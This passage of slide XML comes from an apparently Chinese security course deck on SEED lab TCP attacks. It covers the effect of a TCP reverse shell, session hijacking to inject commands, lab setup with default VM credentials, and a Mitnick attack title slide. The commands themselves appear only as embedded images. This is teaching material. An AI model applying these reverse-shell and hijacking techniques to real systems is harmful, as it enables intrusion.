                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>连接获得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的输入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-342900" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </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在攻击机上输入命令，该命令在靶机上运行，并且在攻击机上显示命令执行的结果</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="143440318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C9241-2354-4152-87D9-C4C4A3DC9718}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>反向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击的效果</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{320FF624-44F6-4D24-B695-5894072A0857}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1654696"/>
            <a:ext cx="8001000" cy="668288"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击机（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>10.0.2.4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）上：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F269D81-5102-466E-80EB-68B50D4D05A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="507614" y="5517232"/>
            <a:ext cx="7920880" cy="1080120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5E1F6A2-1F36-442A-B5F7-46B717C34C95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323528" y="4596916"/>
            <a:ext cx="8001000" cy="668288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>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1">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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="0" dirty="0"/>
              <a:t>目标机（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="0" dirty="0"/>
              <a:t>10.0.2.8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="0" dirty="0"/>
              <a:t>）上：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7855EF3E-E8CC-4384-8902-C6CEDEBEBF75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3851920" y="6021288"/>
            <a:ext cx="453650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对话气泡: 圆角矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C43E64C-BAE8-4696-91B4-E4860CADDB09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5364088" y="4725144"/>
            <a:ext cx="1728192" cy="1154726"/>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rPr>
              <a:t>会话劫持注入命令</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="图片 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B43115A-C045-4A4A-BD33-0C755C683799}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="574675" y="2292792"/>
            <a:ext cx="4362482" cy="871544"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="图片 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C91CBB7-76F6-4151-B8D2-59637C0D287E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="574675" y="3156999"/>
            <a:ext cx="4338669" cy="266702"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="对话气泡: 圆角矩形 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C65A9FEC-932A-481C-98CA-EFB31CBDD2D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5652120" y="1815020"/>
            <a:ext cx="1728192" cy="1154726"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -92896"/>
              <a:gd name="adj2" fmla="val 77074"/>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rPr>
              <a:t>连上服务器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="图片 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65D5DF01-ECF9-407D-8E89-922E9D6D25A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4637117" y="3380339"/>
            <a:ext cx="276227" cy="938219"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="对话气泡: 圆角矩形 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08E55BE4-2212-4680-B090-9CCD70ACA7F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5479953" y="3463170"/>
            <a:ext cx="2844575" cy="989730"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -72311"/>
              <a:gd name="adj2" fmla="val -7063"/>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rPr>
              <a:t>这些命令是运行在服务器上，可以用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>命令查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>确认 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43" name="图片 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AE1EA55-32C0-4ED1-8304-3CBEFB80A142}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="574675" y="3405825"/>
            <a:ext cx="4062442" cy="903404"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6078993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up)">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wipe(left)">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up)">
                                      <p:cBhvr>
                                        <p:cTn id="3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0" grpId="0" animBg="1"/>
      <p:bldP spid="2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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>实验环境</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8194" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="260350" y="1752600"/>
            <a:ext cx="8307705" cy="4267200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Ubuntu Seed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>虚拟机下载地址：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>QQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>群空间</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>虚拟机软件：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>vmware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> (15.5.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>及兼容版本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>) + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>vmware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ubuntu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>系统的用户密码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="471170" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>普通用户： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>seed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>dees</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2800" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   超级用户：root  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" noProof="1">
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>密码：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2800" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>seedubuntu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="927100" marR="0" lvl="1" indent="-469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Char char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2800" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>实验</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" noProof="1">
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>采用一个虚拟机，多个容器来完成</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" noProof="1">
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" noProof="1">
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2800" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2600" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469900" marR="0" indent="-469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Char char="o"/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3000" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8195" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>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en-US" sz="1200" dirty="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>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9275AB-C51F-4F7B-99B7-2ED77D63447F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Mitnick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="内容占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6C72C8E-0F8E-41C2-88BA-5D82FFDB6D5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="539552" y="1916832"/>
            <a:ext cx="6572864" cy="4025242"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
